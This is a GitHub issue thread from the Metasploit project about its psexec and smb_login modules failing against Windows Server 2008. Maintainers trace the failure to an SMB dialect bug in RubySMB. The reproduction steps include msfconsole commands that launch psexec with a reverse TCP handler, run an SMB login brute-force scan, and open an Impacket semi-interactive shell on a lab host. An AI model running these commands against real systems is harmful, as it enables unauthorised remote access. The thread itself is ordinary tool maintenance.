### ISSUE TITLE
psexec and smb_login is broken for windows 2008

### ISSUE THREAD

**Issue by adfoster-r7** [rapid7/metasploit-framework#16447]
## Steps to reproduce

Create a new windows server 2008 machine, and run smb_login and psexec against the target to get failures:

```
msf6 exploit(windows/smb/psexec) > run smb://Administrator:p4$$w0rd@192.168.123.133 lhost=192.168.123.1


[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.133:445 - Connecting to the server...
[*] 192.168.123.133:445 - Authenticating to 192.168.123.133:445 as user 'Administrator'...
[-] 192.168.123.133:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An error occurred reading from the Socket Connection reset by peer
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) >
```

```
msf6 auxiliary(scanner/smb/smb_login) > run smb://Administrator:p4$$w0rd@192.168.123.133 lhost=192.168.123.1

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[*] smb://Administrator:p4$$w0rd@192.168.123.133:445 - Error: 192.168.123.133: RubySMB::Error::CommunicationError An error occurred reading from the Socket Connection reset by peer
[*] smb://Administrator:p4$$w0rd@192.168.123.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Impacket smbexec and psexec work as expected:

```
python3 ./smbexec.py 'Administrator:p4$$w0rd@192.168.123.133'
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>dir
 Volume in drive C has no label.
 Volume Serial Number is 7A99-7ACF

 Directory of C:\Windows\system32
```

**Comment by adfoster-r7** [comment]
Should be resolved by https://github.com/rapid7/ruby_smb/pull/212

**Comment by smcintyre-r7** [comment]
Just a note for future travelers, the root cause of the issue was that older versions of Windows Server 2008 would negotiate the SMB 2.0.2 dialect. When that was the case, it was negotiated directly instead of the wildcard dialect being sent in the response. This caused RubySMB to incorrectly handle the dialect response and not increment the SMB2 message counter. Ultimately this lead to a failure to setup the session so any modules needing that (anything that's authenticated) would fail.

**Comment by smcintyre-r7** [comment]
Changes included in the 3.1.1 gem release. Should be automatically merged into Metasploit during the release cycle on April 28th at the latest if we don't do it explicitly before then.

**Comment by smcintyre-r7** [comment]
Closing this out because it looks like we're shipping RubySMB 3.1.2 now.

https://github.com/rapid7/metasploit-framework/blob/a1555d4b875015778bdefe7db48cd698c5221b2e/Gemfile.lock#L448
